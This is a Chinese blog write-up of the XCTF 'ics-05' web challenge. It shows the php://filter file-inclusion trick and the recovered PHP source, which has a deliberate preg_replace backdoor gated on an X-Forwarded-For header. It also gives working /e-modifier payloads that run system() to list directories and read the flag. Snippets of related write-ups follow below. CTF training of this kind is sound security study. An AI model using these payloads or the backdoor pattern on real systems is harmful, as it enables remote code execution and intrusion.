XCTF isc-05 writeup

最新推荐文章于 2024-05-13 11:33:01 发布
最新推荐文章于 2024-05-13 11:33:01 发布
阅读量378 收藏
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/stepone4ward/article/details/95372180
通过F12查看页面源代码发现可疑处,考虑协议读取内容并修改page参数,经Base64解密得到网页源码,发现危险函数。查看PHP手册及preg_replace函数漏洞,利用其/e修正符,在请求头加入payload以获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目页面如下
在这里插入图片描述
f12查看页面源代码后发现了一个可疑的地方
在这里插入图片描述
考虑使用php://filter协议读取index.php的内容,修改page的参数为php://filter/read=convert.base64-encode/resource=index.php
在这里插入图片描述
base64解密后得到网页源码

<?php
error_reporting(0);

@session_start();
posix_setuid(1000);


?>
<!DOCTYPE HTML>
<html>

<head>
    <meta charset="utf-8">
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <link rel="stylesheet" href="layui/css/layui.css" media="all">
    <title>设备维护中心</title>
    <meta charset="utf-8">
</head>

<body>
    <ul class="layui-nav">
        <li class="layui-nav-item layui-this"><a href="?page=index">云平台设备维护中心</a></li>
    </ul>
    <fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">
        <legend>设备列表</legend>
    </fieldset>
    <table class="layui-hide" id="test"></table>
    <script type="text/html" id="switchTpl">
        <!-- 这里的 checked 的状态只是演示 -->
        <input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开|关" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}>
    </script>
    <script src="layui/layui.js" charset="utf-8"></script>
    <script>
    layui.use('table', function() {
        var table = layui.table,
            form = layui.form;

        table.render({
            elem: '#test',
            url: '/somrthing.json',
            cellMinWidth: 80,
            cols: [
                [
                    { type: 'numbers' },
                     { type: 'checkbox' },
                     { field: 'id', title: 'ID', width: 100, unresize: true, sort: true },
                     { field: 'name', title: '设备名', templet: '#nameTpl' },
                     { field: 'area', title: '区域' },
                     { field: 'status', title: '维护状态', minWidth: 120, sort: true },
                     { field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true }
                ]
            ],
            page: true
        });
    });
    </script>
    <script>
    layui.use('element', function() {
        var element = layui.element; //导航的hover效果、二级菜单等功能,需要依赖element模块
        //监听导航点击
        element.on('nav(demo)', function(elem) {
            //console.log(elem)
            layer.msg(elem.text());
        });
    });
    </script>

<?php

$page = $_GET[page];

if (isset($page)) {



if (ctype_alnum($page)) {
?>

    <br /><br /><br /><br />
    <div style="text-align:center">
        <p class="lead"><?php echo $page; die();?></p>
    <br /><br /><br /><br />

<?php

}else{

?>
        <br /><br /><br /><br />
        <div style="text-align:center">
            <p class="lead">
                <?php

                if (strpos($page, 'input') > 0) {
                    die();
                }

                if (strpos($page, 'ta:text') > 0) {
                    die();
                }

                if (strpos($page, 'text') > 0) {
                    die();
                }

                if ($page === 'index.php') {
                    die('Ok');
                }
                    include($page);
                    die();
                ?>
        </p>
        <br /><br /><br /><br />

<?php
}}


//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}





?>

</body>

</html>

发现危险函数preg_replace
在这里插入图片描述
查看一下php手册
在这里插入图片描述
再查看一下preg_replace函数的漏洞:

/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。提示:要确保replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。

也就是说pattern参数的结尾包含了/e修正符的话,如果replacement构成合法的代码的话便会执行,先在请求头中加入X-Forwarded-For: 127.0.0.1,payload:?pat=/test/e&rep=system('ls%20/var/www/html')&sub=test
在这里插入图片描述
payload:?pat=/test/e&rep=system('cat%20/var/www/html/s3chahahaDir/flag/flag.php')&sub=test获取flag
在这里插入图片描述

GAPPPPP
关注
【PWN系列】XCTF-4-ReeHY-main-100 Writeup
Vicl1fe的博客
11-18 465
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/xingzherufeng/p/9885860.html#commentform https://blog.youkuaiyun.com/seaaseesa/article/details/102907138 分析 其实此题有两种解法,一个是整型溢出,一个是double free。因为暂时只搞懂了double free,先写double free的解法 运行程序大概可以看到
xctf攻防世界dmd-50 writeup
qq_42983283的博客
11-12 543
下载附件,打开: ida64打开,得到关键字符串780438d5b6e29db0898bc4f0225935c0: int __cdecl main(int argc, const char **argv, const char **envp) { __int64 v3; // rax __int64 v4; // rax __int64 v5; // rax __int64 v6; // rax __int64 v7; // rax __int64 v8; // ra..
XCTF-ics-05
臭nana的博客
12-09 377
打开题目,根据题目提示找到设备维护中心 点进去(其他点了都没用),没发现什么有用的东西 点击了云平台设备维护中心后,发现url后面多了点东西,页面上也多了点东西,这里就是突破口 随便改一下page后面传入的值,发现后面的东西会被打印在页面上,尝试php伪协议,构造payload如下 page=php://filter/read=convert.base64-encode/r...
攻防世界WEB ics-05
qq_38969294的博客
05-18 258
isc-05 进入页面 没有什么可以利用的线索 只有设备维护中心可以点开 点进去 点击左上角发现了地址栏的变化 ?page= 似乎是伪协议题的特征 php://filter/read=convert.base64-encode/resource=index.php 直接过滤器 base64编码形式读取源码 获得源码如下 <?php error_reporting(0); @session_start(); posix_setuid(1000); php?> <!DOC
xctf(web)-ics-05
i_am_not_hacker的博客
08-08 975
本题的题目描述如下图所示,查看“设备维护中心” 再查看源码,也没有找到线索,通过php伪协议查看源码 php伪协议参考文章 在题目所给的url后加 ?page=php://filter/convert.base64-encode/resource=index.php 即可查到base64加密后的源码 base64解码后,查看代码,发现后门 //方便的实现输入输出的功能,正在开发中的功能,只能内部...
攻防世界xctf web进阶ics_05writeup
qq_43370221的博客
04-19 421
文章目录isc_05利用PHP伪协议来得到index.php的源码利用 preg_replace漏洞抓包改包&利用get来构造参数 isc_05 检索网页 发现只有一个页面可以打开 发现了类似文件包含的url 可以猜测page是通过get传入了一个文件 ,所以尝试文件包含。又因为index.php页面存在异常 所以尝试读入index.php 利用PHP伪协议来得到index.php的...
[XCTF 4th-CyberEarth]ics-05
sGanYu
08-26 2292
其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 打开题目,是一个工控云管理系统,随意点击旁边的菜单,发现只有设备维护中心可以正常进入 无意间点击左上角‘云平台设备维护中心’之后,发现页面进行跳转,page=index 将URL内的index改为任何字符,页面都会进行回显 在index后添加一个.php,页面回显ok,说明index.php存在,可以尝试读取一下 这里需要用到php://filter协议读内容 php://filter/read=conver..
Xctf isc-07 apache2解析漏洞,php弱类型
wssmiss的博客
04-16 640
Xctf isc-07 题目描述:工控云管理系统项目管理页面解析漏洞 找到index.php页面,有一个view source点击查看 审计三个php代码段可以找到突破点 第一段是个简单重定向,get参数page不为index.php即可 第二段 需要得到一个admin的session,之后可以post传入con与file两个参数 File参数是自定义的文件名字,之后会处理为backup...
XCTF 3rd-HITB CTF-2017 arrdeepee 复现
m0_46580995的博客
07-05 1513
题目说明 我们某一个box被pwn了。在检查过程中,我们发现了一个叫mimikatz的东西,我们以前没有安装过,所以我们清除了,并且重新安装了box。但是,我们忘记备份我们的flag文件了。幸运的是,我们有一个攻击者网络流量捕获。你可以帮我们恢复出flag文件吗? 得到的是一个pcap包 有大量的tcp和udp流 查看udp流有以下的关键字 “ TSSecKeySet1”和“ Microsoft Strong Cryptographic Provider” 保存下来进行分析 有一些证书和私钥尝试openss
【网络安全 CatCTF】ezbypass-cat_xctf ezbypass-cat
2401_84972950的博客
05-13 378
该题考察白名单目录穿透白名单目录穿透漏洞指的是攻击者通过特定的技术手段,绕过应用程序的访问控制,直接访问应用程序中未被授权的目录或文件。
xctf_web ics-05
fly夏天的博客
09-23 619
刚打开网站 点击各个按钮发现除了一个index页面,没有别的变化。 尝试扫描,没扫出东西,看来问题就在这个index页面上了 这里我尝试查看了源码,并没有发现啥有用的东西。 只有一个可传参的参数page。 拜读了大佬的攻略,才发现可以利用文件读写漏洞读取源码。 page=php://filter/read=convert.base64-encode/resource=index.p...
攻防世界ics-5wp
T19er的博客
07-10 3058
0x01 ics-5 浏览只有一个index页面,想到down源码,无果。 查看源代码发现有个page参数可以传值,利用LFI来查看源码。 /index.php?page=php://filter/read=convert.base64-encode/resource=index.php 读到base64加密的源码 PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwoKQHNl...
攻防世界writeup——Web(持续更新)
Lethe's Blog
08-12 8466
lottery(XCTF 4th-QCTF-2018) 打开题目先注册,然后发现flag可以购买。但得先去买彩票赢得足够的钱,七位数字的彩票,猜中的位数越多,赢得的钱越多,因此应该在买彩票这里出了一些漏洞。 1、首先访问目录robots.txt,存在.git泄露。 2、利用工具GitHack,得到网站源码: 3、进行代码审计,问题出现在api.php里的buy函数,这个函数就是用来判断是否猜...
攻防世界XCTF:ics-05
末初 · mochu7
03-06 1400
根据提示来到设备维护中心 查看源码可以发现这里隐藏了个超链接变量传参,看到变量传参,有可能存在文件包含漏洞读取源码,然后这个站又是php的站,那么使用php伪协议读取源码: ?page=php://filter/read=convert.base64-encode/resource=index.php 出现了base64编码过的源码,使用base64解码后源码如下: <?php err...
攻防世界web高手进阶区ics-05XCTF 4th-CyberEarth)WriteUp
D-R0s1的博客
08-04 5145
解题部分 题目来源 攻防世界web高手进阶区ics-05XCTF 4th-CyberEarth) 1.拿到题目以后,发现是一个index.php的页面,并且设备…没有显示完全,此位置可疑。 2.源代码中发现?page=index,出现page这个get参数,联想到可能存在文件包含读源码的漏洞,尝试读取index.php的页面源码 通过php内置协议直接读取代码 /index.php?page=p...
CTF Web题 部分WP
热门推荐
wywwzjj
11-26 13万+
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002/yanzhengma/ 改一下字符输入长度的限制 3.web基础$_GET http://123.206.87.240:8002/get/ ?var=val 4.web基础$_P...
Writeup】Boston Key Party CTF 2015(部分题目)
企鹅学coding~
03-05 1万+
假期试着做了一下这场美国的CTF比赛,无奈题目看了一遍都没什么想法,只好等比赛结束再学习了。在这里总结一下通过此次比赛学到的姿势。 以下是六道php代码审计题目。 1.Prudential   I don‘t think that sha1 is broken. Prove me wrong. 代码如下: level1 <?php require 'flag.p
攻防世界web新手部分,进阶部分
舞动的獾
04-08 4821
title: 攻防世界第一题 date: 2019-04-08 19:31:23 author: 舞动之獾 top: false cover: true coverImg: https://img-blog.csdnimg.cn/20190408193755785.PNG categories: Markdown tags: web 网络安全 攻防世界新手第一题writeup 点击传送地址...
赛博地球杯工业互联网安全大赛web题--工控系统的敏感消息遭泄漏
r00tnb的博客
07-26 1477
前言 web题大致看了一下,都没啥思路。。。。。麻蛋签到题也不会,但是这道题我是有思路的,套路跟以前做过的ctf题目类似,算是中规中矩的题目了。 分析 题目内容: 云平台消息中心,泄漏了不该泄漏的消息。导致系统可以被入侵。 既然是信息泄露,首先想到的是源码泄露。试了一下,发现是git目录泄露,那么利用工具直接把git目录下载下来(工具网上有但我是自己写的,有时间写一篇博客记录...
XCTF-WEB进阶-fakebook
最新发布
02-28
### XCTF WEB进阶 Fakebook 解题报告 #### 源码分析 Fakebook 类似于社交网络平台,在此环境中存在多个功能模块,包括但不限于用户注册、登录以及个人信息管理等功能。通过查看源代码发现,该应用可能存在多种安全漏洞。 对于假想的 `fakebook` 平台而言,其核心逻辑通常围绕着用户的会话管理和数据交互展开。假设存在如下简化版 PHP 伪代码表示部分关键业务流程: ```php <?php class User { public $username; public $password; function login($input_username, $input_password){ // 存在一个潜在的安全隐患:未对输入做严格验证 if ($this->username === $input_username && md5($input_password) === $this->password){ $_SESSION['logged_in'] = true; return "Login successful"; } return "Invalid credentials"; } } ?> ``` 上述代码片段展示了用户认证过程中可能存在的安全隐患——使用弱哈希算法 MD5 对密码进行了处理[^1]。 #### 安全问题剖析 基于以上描述可以推测出几个主要攻击面: - **弱哈希函数**:MD5 已经被证明不再适合用于保护敏感信息,因为它容易受到碰撞攻击的影响。 - **缺乏输入过滤机制**:未能有效防止恶意字符进入系统内部,这可能导致 SQL 注入或其他类型的注入攻击发生。 - **不恰当的错误消息返回**:当用户名或密码错误时给出的具体提示可能会帮助攻击者缩小猜测范围。 #### 利用技巧 针对这些弱点,参赛选手可以从以下几个方面入手尝试突破并解决问题: - 尝试暴力破解或者彩虹表查找已知 MD5 值对应的原始字符串; - 测试是否存在其他形式的数据注入风险点,比如 URL 参数、POST 请求体内的字段等位置; - 探索是否有任何地方暴露出过多调试信息给外部访问者利用; 成功完成挑战后一般可以获得 flag 或者进一步的操作权限作为奖励。 #### 复现过程 为了模拟真实的渗透测试场景,建议按照以下方式构建实验环境来进行练习: 1. 构建一个类似的 Web 应用程序框架,确保其中包含了所有必要的组件和服务依赖关系; 2. 实施相应的防护措施来抵御常见的Web 攻击手段,如 XSS 和 CSRF 等; 3. 使用工具辅助自动化执行某些特定任务,例如 Hydra 可以用来实施字典攻击尝试登陆接口; 4. 记录每一步操作细节以便后续总结经验教训,并分享给社区成员共同学习进步。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值